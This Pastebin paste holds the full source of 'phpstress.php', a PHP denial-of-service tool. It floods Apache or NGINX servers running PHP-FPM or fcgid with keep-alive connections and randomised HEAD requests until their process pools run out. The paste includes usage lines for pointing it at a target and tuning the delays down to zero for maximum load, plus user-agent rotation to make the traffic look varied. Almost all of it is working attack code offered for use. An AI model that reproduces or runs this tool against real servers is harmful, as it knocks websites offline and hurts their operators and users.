Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- #!/usr/bin/php
- /*
- File: phpstress.php
- Written by: d4rk0 / @d4rk0s
- Concept by: Vinny Troia / @VinnyTroia
- Night Lion Security (http://www.nightlionsecurity.com)
- ---------------------------------------------------------------------
- Description:
- This is a light-weight low-bandwidth required PHP script that creates
- a type of denial of service on a Linux-based Apache or NGINX web server
- that process PHP content with PHP-CGI (fcgid) or PHP-FPM (Apache or NGINX).
- The script will create a number of fake PHP connections, causing the server
- to quickly launch additional processes to meet the new demand. In addition,
- the server's connections are kept open (via keep-alive), causing the server
- to quickly run out of resources.
- In order to completely max out the server's
- resources, the script's delay parms need to both be set to 0.
- For more information, please view the complete post at
- http://www.nightlionsecurity.com/blog/
- ----------------------------------------------------------------------
- Disclaimer:
- Don't be a dick.
- ----------------------------------------------------------------------
- Usage:
- php phpstress.php http://www.target.com/?r=%r% -m 1000000000 -k Y -c 150 -d 0.5 -r 0.01
- OR
- php phpstress.php www.target.com/wp-content/?r=%r%
- Socks Proxy: * NOT IN ALPHA VERSION
- -s = Y or N / 127.0.0.1:9050 Username:Pw
- Default is N leaving out Username:Pw means there is no Username and Password
- Edit the phpstress.socks file if you want to use a socks proxy
- ----------------------------------------
- Commands:
- Target URL picking a resource intense page and inserting %r where the GET variables data is will generate random chars
- -m = Maximum requests not specifying this will leave it at a large default number to exit script on
- *nix flavored simply press control c to kill the program and exit or whatever TTY command you have setup
- to exit a program on command line
- Default value is 1000000000
- -k = Y or N Keep Alive Check will check if Server uses the Keep-Alive Option to keep the connection alive
- Default value is Y
- -c = Maximum Request Per Connection each connection opened will then request D number of times
- Default value of 150
- -d = Delay Between Connections The number of seconds to delay between opening a new connection.
- Default value: 0.5
- -r = Delay Between Requests The number of seconds to delay between outgoing requests.
- Default value: 0.04
- */
- // BEGIN SCRIPT
- error_reporting(0);
- // make sure script has no time limit for execution
- set_time_limit(0);
- /*
- Randomly pick a UserAgent for deployment on page request
- PARAM: None
- RETURN: returns a random user agent string
- */
- function userAgentRand(){
- // lets create our array with random user agents
- $userArray = array("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7",
- "Mozilla/5.0 (Windows; U; Windows NT 5.1; RW; rv:1.8.0.7) Gecko/20110321 MultiZilla/4.33.2.6a SeaMonkey/8.6.55",
- "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:1.8.0.7) Gecko/20110321 MultiZilla/4.33.2.6a SeaMonkey/8.6.55",
- "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
- "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
- "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; de-de) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
- "Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)",
- "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)".
- "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
- "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
- "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
- "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10".
- "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36",
- "Mozilla/5.0 (Windows NT 5.2; RW; rv:7.0a1) Gecko/20091211 SeaMonkey/9.23a1pre",
- "Mozilla/5.0 (Windows NT 5.2; RW; rv:7.0a1) Gecko/20091211 SeaMonkey/9.23a1pre");
- // Lets shuffle our array
- shuffle($userArray);
- // count how many user agents in array
- $count = count($userArray);
- // minus one to adjust starting at 0
- $count = mt_rand(0,$count-1);
- // return "Random" User Agent
- return $userArray[$count];
- }
- /*
- Function used for adding random string to request urls
- PARAM: none
- RETURN: returns random string of chars
- */
- function quick_rand(){
- $rand_string = "";
- $letters = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
- for($i=0;$i<mt_rand(5,16);$i++){
- $rand_string.=$letters[array_rand($letters)];
- }
- return($rand_string);
- }
- /*
- Parse the target URL to return the host, path and query
- PARAM: the URL string to be parsed
- RETURN: returns an array of host path & query
- */
- function parseUrl($target_url){
- $t = "";
- $t = strpos($target_url,'http://');
- if ($t === false) {
- $target_url = "http://". $target_url;
- }
- $target_url_parsed = parse_url($target_url);
- $target_url = array();
- $target_url['scheme'] = $target_url_parsed['scheme'];
- $target_url['host'] = $target_url_parsed['host'];
- $target_url['path'] = $target_url_parsed['path'];
- $target_url['query'] = $target_url_parsed['query'];
- $target_url['port'] = $target_url_parsed['port'];
- if(!$target_url['path']){
- $target_url['path'] = '/';
- }
- if(!$target_url['port']){
- $target_url['port'] = 80;
- }
- if ($target_url['scheme']){
- // return Parsed Array for Deployment and usage
- return $target_url;
- }else{
- // return proper url array
- $target_url['host'] = "http://". $target_url['host'];
- return $target_url;
- }
- }
- /*
- Check Query if none just append path if both append path + query
- PARAM: the parsed array of target url
- RETURN: return appended array
- */
- function checkQuery($target_url){
- if($target_url['query']){
- $request_url = $target_url['path']."?".$target_url['query'];
- } else {
- $request_url = $target_url['path'];
- }
- // return request url
- return $request_url;
- }
- /*
- check if user is launching this from command line or browser
- PARAM: none
- RETURN: return 1=browser or 0=command line
- */
- function checkCommandLine(){
- if(defined('STDIN')){
- $num = 0;
- }else{
- $num = 1;
- }
- return $num;
- }
- /*
- Check if the remote host supports Keep-Alive
- PARAM: parsed target URL
- RETURN: either keep-alive or server doesn't support keep alive string
- */
- function keepAlive($target_url){
- // Grab random user agent
- $useragent = userAgentRand();
- // Send request with Keep-Alive header
- $socket = fsockopen($target_url['host'], $target_url['port'], $errno, $errstr, 3);
- // if connection cant open
- if(!$socket){
- die("Uh-oh: Failed to open a connection to ".$target_url['host']." on port ".$target_url['port']."\n\n");
- }
- // lets build payload for keep-alive check
- $request = "HEAD / HTTP/1.1\r\nHOST: ".$target_url['host']."\r\nUser-Agent: ".
- $useragent."\r\nConnection: Keep-Alive\r\n\r\n";
- fwrite($socket, $request);
- $reply = "";
- // loop until end of buffer and socket stream
- while (!feof($socket)){
- $buffer=fgets($socket, 128);
- $reply.=$buffer;
- //Watch for end of reply and close socket/break out of loop
- if($buffer == "\r\n"){
- fclose($socket); break;
- }
- }
- //Check if the reply to our above request includes 'Connection: close
- if(strpos($reply, "Connection: close")){
- return "NO:KEEP-ALIVE";
- }else{ return "KEEP-ALIVE"; }
- }
- /*
- This is the actual attack that will test the stress on the server
- PARAM: target_url , request url , max requests , max request per connection
- RETURN: returns TRUE
- */
- function sendphpstress($target_url,$request_url,$mr,$mpc,$dbr,$dbc){
- // max requests divided by max requests per connection
- $max_connections = ceil($mr / $mpc);
- echo "[!] To exit press control C or whatever TTY options are set to exit command line program\n\n\n";
- // lets loop through connections
- for($c=0;$c<$max_connections;$c++){
- echo "Opening connection [".($c+1)."] to ".$target_url['host']."..";
- @$attack_socket = fsockopen($target_url['host'], $target_url['port'], $errno, $error, 3);
- // cant open socket display fail
- if(!$attack_socket){
- echo "failed (".$error.")"."\n";
- } else {
- // Success lets send out connections
- echo "success"."\n"."Sending requests: |";
- //Stay within our max_requests_per_connection limit
- for($r=0;$r<$mpc;$r++){
- // grab a ran user agent
- $useragent = userAgentRand();
- // build payload for attack
- $request = "HEAD ".str_replace("%r%", quick_rand(), $request_url)." HTTP/1.1\r\nHOST: ".$target_url['host']."\r\nUser-Agent: ".$useragent."\r\nConnection: Keep-Alive\r\n\r\n";
- // write socket and make connection
- @fwrite($attack_socket, $request);
- echo ".";
- // Delay between requests 1 second requests
- usleep($dbr * 1000000);
- }
- echo "|"."\n";
- }
- @fclose($attack_socket);
- echo "Closed connection"."\n";
- // amount of time to delay between connections
- usleep($dbc * 1000000);
- }
- return True;
- }
- /*
- This function takes all the commands and outputs them strips them and gets them ready for proper use
- PARAM: the argv array of commands to be processed
- RETURN: returns processed array or FALSE for error
- */
- function inputCommand($commands){
- // Take Commands Being Passed return values as array
- $outputCommand = array();
- // count number of commands for loop
- $count = count($commands);
- // loop through commands
- for ($d = 0; $d < $count; $d++){
- // lets build commands
- switch ($commands[$d]){
- // Display help list of commands and exit
- case "--help":
- return "HELP";
- // Display help list of commands and exit
- case "-":
- return "HELP";
- // socks proxy
- case "-s":
- $outputCommand[] = "-s";
- // Grab Type /////////////////
- $new_number = $d++;
- $value = $commands[$d];
- $outputCommand[$new_number] = $value; // Append data to Array
- break;
- // target
- case "-t":
- $outputCommand[] = "-t";
- // Grab Type /////////////////
- $new_number = $d++;
- $value = $commands[$d];
- $outputCommand[$new_number] = $value; // Append data to Array
- // Grab Target ////////////////
- break;
- // maximum requests
- case "-m":
- $outputCommand[] = "-m";
- // Grab Type /////////////////
- $new_number = $d++;
- $value = $commands[$d];
- $outputCommand[$new_number] = $value; // Append data to Array
- // Grab Target ////////////////
- break;
- // keep alive yes or no
- case "-k":
- $outputCommand[] = "-k";
- // Grab Type /////////////////
- $new_number = $d++;
- $value = $commands[$d];
- $outputCommand[$new_number] = $value; // Append data to Array
- break;
- // maximum request per connection
- case "-c":
- $outputCommand[] = "-c";
- // Grab Type /////////////////
- $new_number = $d++;
- $value = $commands[$d];
- $outputCommand[$new_number] = $value; // Append data to Array
- break;
- // delay between connections
- case "-d":
- $outputCommand[] = "-d";
- // Grab Type /////////////////
- $new_number = $d++;
- $value = $commands[$d];
- $outputCommand[$new_number] = $value; // Append data to Array
- break;
- // delay between requests
- case "-r":
- $outputCommand[] = "-r";
- // Grab Type /////////////////
- $new_number = $d++;
- $value = $commands[$d];
- $outputCommand[$new_number] = $value; // Append data to Array
- break;
- }
- }
- // return array with results
- return $outputCommand;
- }
- /*
- Check if we are on command line or not
- PARAM: NONE
- RETURN: NONE exits if true
- */
- function commandLineCheck(){
- // Check if not command line exit dont do anything
- if ($num = checkCommandLine() === 1){
- // return error to user and quit script
- echo "<h1><B>Error: phpstress only runs from command line prompt</b></h1>";
- exit(0);
- }
- }
- /*
- Displays the Help menu showing all available program commands
- PARAM: NONE
- RETURN: NONE exits
- */
- function displayHelp(){
- echo "
- PHPStress 1.0
- Usage: php phpstress.php [url] [options]
- OPTIONS:
- -t: Target URL picking a resource intense page and inserting %r
- where the GET variables data is will generate random chars
- -m: Maximum requests not specifying this will leave it at a large default number
- Default value is 1000000000
- -k: Keep Alive Check will check if Server uses the Keep-Alive Option
- to keep the connection alive (Y or N)
- Default value is Y
- -c: Maximum Request Per Connection each connection opened will
- then request D number of times
- Default value of 150
- -d: Delay Between Connections - The number of seconds to delay
- between opening a new connection.
- Default value: 0.5
- -r: Delay Between Requests The number of seconds to delay between
- outgoing requests
- Default value: 0.04 \n\n";
- exit(0);
- }
- /// END FUNCTIONS BEGIN ACTUAL SCRIPT
- //*********************************************************
- // check if on command line
- commandLineCheck();
- // sleep for a couple seconds before going
- //echo " [X] Processing Commands Now lets begin Attack.";
- //@usleep(1000666);
- // check if arguments on commmand line are present
- if (isset($argv[1])) {
- // Process commands now
- $results = inputCommand($argv);
- // display help
- if ($results === "HELP"){
- // display help
- displayHelp();
- }
- // Set counter Values
- $d = 0;
- $num = "";
- /////////////////////
- // Set Program Default Variables
- $target_url = "";
- $socks = "n";
- $k = "y";
- $mr = 10000000;
- $mpc = 150;
- $dbr = 0.02;
- $dbc = 0.7;
- // lets assign all variables now and get ready for attack
- foreach($results as $key=>$com){
- // Socks proxy default N
- if ($com == "-s"){
- $r = $key;
- if ($r == 0){ $r++;$r++; }else{
- $r++;}
- $socks = $results[$r];
- }
- // Maximum requests Default is 100000000
- if ($com == "-m"){
- $r = $key;
- if ($r == 0){ $r++;$r++; }else{
- $r++;}
- $mr = $results[$r];
- }
- // Check is server keep alive? default is Y
- if ($com == "-k"){
- $r = $key;
- if ($r == 0){ $r++;$r++; }else{
- $r++;}
- $k = $results[$r];
- }
- // Max request per connection
- if ($com == "-c"){
- $r = $key;
- if ($r == 0){ $r++;$r++; }else{
- $r++;}
- $mpr = $results[$r];
- }
- // delay between connections
- if ($com == "-d"){
- $r = $key;
- if ($r == 0){ $r++;$r++; }else{
- $r++;}
- $dbc = $results[$r];
- }
- // delay between requests
- if ($com == "-r"){
- $r = $key;
- if ($r == 0){ $r++;$r++; }else{
- $r++;}
- $dbr = $results[$r];
- }
- }
- // append url now
- $target_url = $argv[1];
- // Lets now check and set Default values
- if (($target_url == "") || empty($target_url)){
- // Error no Target URL set
- echo " [!] ERROR: No Target URL set. \n";
- exit(0);
- }
- // Socks check now
- if ((strtolower($socks) == "n") || (strtolower($socks) == "y")){}else{
- // error socks is either a n or y question
- echo " [!] ERROR: Socks is either a [y]es or [n]o question\n\n";
- exit(0);
- }
- // keep alive
- if (strtolower($k) != "n" || strtolower($k) != "y"){}else{
- // error socks is either a n or y question
- echo " [!] ERROR: Keep Alive is either a [y]es or [n]o question\n";
- exit(0);
- }
- // Max request check now
- if ((is_numeric($mr)) || ($mr != "") || (!empty($mr))){}else{
- // error max request is not a number
- echo " [!] ERROR: Max Request must be a valid number. Default is 100000000\n";
- exit(0);
- }
- // Max per connection
- if ((is_numeric($mpc)) || ($mpc != "") || (!empty($mpc))){}else{
- // error max request is not a number
- echo " [!] ERROR: Max Request Per Connection is invalid. Default is 150\n";
- exit(0);
- }
- // Delay between request
- if ((is_numeric($dbr)) || ($dbr != "") || (!empty($dbr))){}else{
- // error
- echo " [!] ERROR: Delay between requests is invalid. Default is 0.04 seconds. \n";
- exit(0);
- }
- // Delay between connections
- if ((is_numeric($dbc)) || ($dbc != "") || (!empty($dbc))){}else{
- // error
- echo " [!] ERROR: Delay between connections is invalid. Default is 0.5 seconds. \n";
- exit(0);
- }
- }else{
- // display help
- displayHelp();
- exit(0);
- }
- // parse target url return a parsed array
- $target_url = parseUrl($target_url);
- // check if query empty or not empty
- $request_url = checkQuery($target_url);
- if ($k == "y"){
- // check if server supports keep-alive make sure its a parsed target url
- $keepAlive = keepAlive($target_url);
- // Switch to check results if server keeps alive
- switch ($keepAlive){
- case "NO:KEEP-ALIVE":
- $mpc = 1;
- break;
- case "KEEP-ALIVE":
- $mpc = 100;
- break;
- }
- }
- // send out payloads and connection
- sendphpstress($target_url,$request_url,$mr,$mpc,$dbr,$dbc);
- // EOF
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement